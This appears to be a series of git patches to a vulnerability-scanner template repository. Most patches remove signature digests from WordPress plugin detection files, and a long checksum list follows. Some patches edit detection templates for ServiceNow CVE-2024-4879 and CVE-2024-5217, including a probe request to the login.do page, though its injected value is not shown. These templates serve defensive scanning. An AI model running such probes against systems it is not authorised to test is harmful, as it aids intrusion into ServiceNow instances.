'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068c352046b38d5de9b968796c6a0ad507f44de816accb907376cd96f69bcc6d0022100cde26b7eda7a1e9ee7ab5a0cd8a347ec776eec6ce428ef848e9991cc35a35db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index cf22cab68e..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c55434dd9d277759778ccc2e79706aa230036bf1a068552eab760e0e1d144f6b022012ea0155c4342079df63a9c5300c02f6ae3017450b9d6156646af41e74a55d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index d885ff3fae..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd48a444f2baf63545e75757601e66d9d20a290b13b51fc8dd64fdbfd929c35f022100abd7003d6c190eb5c4215ea5b1060258c4440d4fadcce4c4b0bd735c2f5dcb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 6f9da74cae..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206d4b5a920160c8cd6b93b436ef63f1177b14a8af414b7fa18a1c3d4f5811709d02207e1a424affe390f466f6f69c1b2c4bbf9c9b462450559625a17cc2e87674d1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index dc84f1c6a4..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203aa723dd4aee2c9e596cfbd43b1d1b018b3210aa953a9aed070fe68536e31a1d022100e92ac3098771e4a2ab26c43e267d5ecf2993e3c770c3ee193913ec95e5067aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 29214c8940..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059721dd8b02050eeeef7211d6ddc8c6f5c327d8bcf9bac29cd1d264db14742330221008e65617e4e31fbed04b338e435c9b4dae3c57094c332d01f6c9a969316dab4d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 9977df376f..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd6e114fd42a31c3e0024f68927972b9b67535592094cdc1e322047afe917efc02207af3b38a929f8ebe39b4904baef73a3104b1c7b5e9e19d1d93f29bfbfe93e914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 78a69d103e..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e8e67df2e82cebd4ef73b5fc34caca32343da02ac08327167b257aca2696b4fb02210094b71c31669b3a9a84887054bcdfd88de08783c30f6ae542d42c93aa779c76fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index b1726192cd..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a13deec49f9210240a8bea9315ec997f64157909437278302166238cf5626b30022047c30dcc5043a96f954af02341c3f4337d22ac4cbdb67b2f51cef5ba8e673507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 0679a001f3..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5ab2b278c189539908d5eb36294ffc0342917bd26b7208d91d570f93fd4d35e022100dddc49e08813e1fc47b2483923352ce00e311c047576c6c26a0033998b71db8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 79a4a0ea2c..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b688a4888b077484fe596645fc8ac3f488e39e8439c21dfcbf9727a568d8eea022100b2dd0b7680ff49c9209522a2434f59e96a67b264d18ea18091237d6e9de2d550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47d6d3fc03..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054893c90d92a403505a413ae3d9ecc986fd27d89b3820c8b8da9c42c81ca4f5b022059f923045b7a8e9bfa6efabef8f37af25dfc56aaae8e0335f47725587439d1fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index be61093ee3..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220399e770a7d511e3c609d2f16df9b710e2a1ccb6e95a9662431c3b8e2d01954c002203839aee43d2f0ee06a605f4363cae3ed8275f86076d9b8ca0eb04dd6d3825746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 51c453e66e..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202fa51b7060e4bb18976a21519067c54c0dbc8e91fbe50821b5e1cd0e8f9b1fb3022100c4f09621951f5a234bb7b018e55f4e8e8b0a891d193bd2d237e621644b23047b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 8f429f3135..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad5f880a2e3f6a3e85d73566b1e09682714e63a58cc7b31905b157a39844d42602204adb0be0dbcfb0bbf46ebaf828b44418a45d20d8dc47d3b14a9c9505db4eb0fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index df24e4294a..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028b65b533a28836a9e78665f1b68f20824f05271589f6a791660e5c45243b0bd0220120ba40d5a24cd3640bf081f67bf37251e4c4e1cc0c63a4542aca9912917e3a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5a6a759873a9dbcc3f589b0010ccb118af65f8c8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:07:12 +0530 Subject: [PATCH 1214/1841] Update CVE-2024-4879.yaml --- http/cves/2024/CVE-2024-4879.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 1f8343fa62..c8184a9c4c 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -1,15 +1,16 @@ id: CVE-2024-4879 info: - name: Jelly Template Injection Vulnerability in ServiceNow UI Macros + name: ServiceNow UI Macros - Template Injection author: DhiyaneshDk,ritikchaddha - severity: critical + severity: unknown description: | ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154 + - https://nvd.nist.gov/vuln/detail/CVE-2024-4879 metadata: verified: true max-request: 1 @@ -27,7 +28,7 @@ info: http: - raw: - | - GET /login.do?jvar_page_title= HTTP/1.1 + GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -35,7 +36,7 @@ http: - type: word part: body words: - - '
    49
    ' + - '
    1787569
    ' - type: word part: header From 742e1f04678af60515a91313c12261f08ef6db97 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:09:47 +0530 Subject: [PATCH 1215/1841] lint fix --- http/cves/2024/CVE-2024-4879.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index c8184a9c4c..133e72f7f3 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -1,7 +1,7 @@ id: CVE-2024-4879 info: - name: ServiceNow UI Macros - Template Injection + name: ServiceNow UI Macros - Template Injection author: DhiyaneshDk,ritikchaddha severity: unknown description: | From 394109efe83ce93b07971f7f778affa91ba1da9e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:11:27 +0530 Subject: [PATCH 1216/1841] Update CVE-2024-5217.yaml --- http/cves/2024/CVE-2024-5217.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index 998cff4b47..5f5f3502d6 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -1,7 +1,7 @@ id: CVE-2024-5217 info: - name: ServiceNow Incomplete Input Validation in GlideExpression Script + name: ServiceNow - Incomplete Input Validation author: DhiyaneshDk,ritikchaddha severity: critical description: | @@ -10,6 +10,7 @@ info: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313 + - https://nvd.nist.gov/vuln/detail/CVE-2024-5217 metadata: verified: true max-request: 1 From cc3bb11f76bc52ad66b6cb939405cb7168a882f7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:13:33 +0530 Subject: [PATCH 1217/1841] Update servicenow-title-injection.yaml --- http/misconfiguration/servicenow-title-injection.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml index f1957d4b6f..12c5ba8f5d 100644 --- a/http/misconfiguration/servicenow-title-injection.yaml +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -23,17 +23,16 @@ info: tags: cve,cve2024,servicenow,injection http: - - raw: - - | - GET /login.do?jvar_page_title= HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/login.do?jvar_page_title=" matchers-condition: and matchers: - type: word part: body words: - - '<style><foo>abc</foo></style>' + - '<style><foo>Injected Title</foo></style>' - type: word part: header From da77946a5391add6a355f184fbed54bf2833ee39 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:44:00 +0000 Subject: [PATCH 1218/1841] Auto Generated New Template Addition List [Mon Jul 15 04:44:00 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 472a68f10b..be9a06be7b 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,8 @@ http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml +http/cves/2024/CVE-2024-4879.yaml +http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml From 6262f1359171aafbda50a021d5cdea1863a39bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:44:07 +0000 Subject: [PATCH 1219/1841] Auto Generated Templates Checksum [Mon Jul 15 04:44:07 UTC 2024] :robot: --- templates-checksum.txt | 409 +++++++++++++++++++++-------------------- 1 file changed, 205 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 20bd3ba60f..abe35b6839 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -787,7 +787,7 @@ helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993f helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f helpers/wordpress/plugins/elementor.txt:9e43adc2b2562071078f6f82962886b245d01a6a -helpers/wordpress/plugins/elementskit-lite.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a +helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:ccf30be4f6440a2ed97fd66ad803378be157d525 @@ -929,7 +929,7 @@ helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-fastest-cache.txt:0489698a3b78229a8b5df0f360850ce63827cf67 +helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 helpers/wordpress/plugins/wp-mail-smtp.txt:9a0a06f6eb18bf496057acce15162dc100f43480 @@ -3492,6 +3492,7 @@ http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 +http/cves/2024/CVE-2024-4879.yaml:ff11adf8264ac17f5c4b5e238d32016c92492b75 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c @@ -5823,7 +5824,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 -http/misconfiguration/mixed-active-content.yaml:ceb7f34460e65ee99552442d17590a164b60d28e +http/misconfiguration/mixed-active-content.yaml:6802abd7b12e82a87a10147547a197d1e6756030 http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc http/misconfiguration/mlflow-unauth.yaml:782c87a81f600d3dd2782e60f63080d361abbb93 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 @@ -7279,228 +7280,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:2c03be2a489d02086e8813d7ad847c0ad3dd7aed -http/technologies/wordpress/plugins/add-to-any.yaml:3aa9016ef0d3ea59baa3fe10c9adf934be896387 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:894597d021248e51e6a89adc455688ef7478c067 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:99e512547b8ccd401a46cd9c39584fa5804eca70 -http/technologies/wordpress/plugins/akismet.yaml:a01aefeac3fcfeebfb1af663a2d78ed6898e7170 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:237029cee578746310d220dc0a9673052fa1f525 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:90b75d28fcb36d92c4edc2a2441c00edbfc45181 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:03eaa1bfc120647a3d2a5e9cc574ee6cd3705f5d -http/technologies/wordpress/plugins/amp.yaml:7e933d54de0c7c47f5610cfb4340f36150e753c5 -http/technologies/wordpress/plugins/antispam-bee.yaml:e5e3072d23794684cafa941394b46fd96a28adaa -http/technologies/wordpress/plugins/astra-sites.yaml:7bbc9d8214f5301a1ae996d1bff4277eb28bd904 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:bd4204a8d3304faf8f87a47f16fd7050ab837076 -http/technologies/wordpress/plugins/backwpup.yaml:5c96d6d1cc1e4c06630a430c38947c7a98954488 -http/technologies/wordpress/plugins/better-search-replace.yaml:a1a8ab4353c0dd975cc6922ca883f85b3babab8b -http/technologies/wordpress/plugins/better-wp-security.yaml:9238b4e15a9c87629b34b378bf6dd5bafbb9268a -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:da7756b499eb168d91279ffcb8300024170b8ed4 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1a97cb21f5bc2880fcb34e370f42edbf1b2cb25f -http/technologies/wordpress/plugins/breeze.yaml:de3c7485b46fe3723c378d33c66303ada6ab08c9 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0c5e75220423ab609c0cec2f9d8bba9da6a6a745 -http/technologies/wordpress/plugins/chaty.yaml:4b22e2f7d14295a1397a0501b749824b20e51562 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:448b32b3a09451524b4611bb574a0af514d3d112 -http/technologies/wordpress/plugins/classic-editor.yaml:f9de7282e8a4f3636f8289a74892ab1b133709e2 -http/technologies/wordpress/plugins/classic-widgets.yaml:0671a4fb0b3a51406a7cd855b58aabea7fd4fdbc -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:8cb9275d92436c072ba9e5fe7673fa4df48bc3a9 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:262d760e3cabbf08044b70eaa37648444a513e10 -http/technologies/wordpress/plugins/coblocks.yaml:74c1b3d0a30c62f647866d328875034cf03e767d -http/technologies/wordpress/plugins/code-snippets.yaml:a415bf81573b7cd6e21cf80c977d15217b66733c -http/technologies/wordpress/plugins/coming-soon.yaml:56ff6cd44ed553dab7557381f6826bc22be6d0d6 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:45ab5ff533729da12df15efdc2af5d6076dd63dd -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:25f25560c6191b9b13dcdd39f20657817f8dd712 -http/technologies/wordpress/plugins/contact-form-7.yaml:9b18111c1d3ef8aa0a9a14e3c3d1dee75519e022 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:dc6f12cabb4452f9b7db40f2d0f4cf6014dc5e9f -http/technologies/wordpress/plugins/cookie-law-info.yaml:501cfd5ed8d2a41ccc66e8ec96ff4e46ccc4b04f -http/technologies/wordpress/plugins/cookie-notice.yaml:0ea921a09cf09548d3abe14ccaeb61c1d4dfd3f0 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:697e73fbdd31131bd35754609055121a41f6b699 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fe531b3a2df00eba3c75bc0d5e18bb9e62ae0815 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:0643adbb4d743a10d1bbd05c906648dbe02e7c88 -http/technologies/wordpress/plugins/custom-css-js.yaml:0a11dbe86ab9af4a07081863b6ca28fa83ab3d48 -http/technologies/wordpress/plugins/custom-fonts.yaml:d213744fc302ec5e41520e3eb0ff9d6c087257f0 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b86c36e18e98abb66200d31e62a2cfa618a65347 -http/technologies/wordpress/plugins/disable-comments.yaml:b9954696703cd77dad4562e4a870d90db913aa19 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:a9de4d801db7404bf6111de593ed5c7beac7f466 -http/technologies/wordpress/plugins/duplicate-page.yaml:b61ff2fd9af8662e12e8821f423c24a057cb6fb6 -http/technologies/wordpress/plugins/duplicate-post.yaml:25e0e3e800e8f46ab2a2800b87c945113b90bdc6 -http/technologies/wordpress/plugins/duplicator.yaml:d1938650069f7fb44bb02fef3235903d68e1097c -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9e3cec9b2c2aa99fc3eaef3e4f67dd9e26fadfc0 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 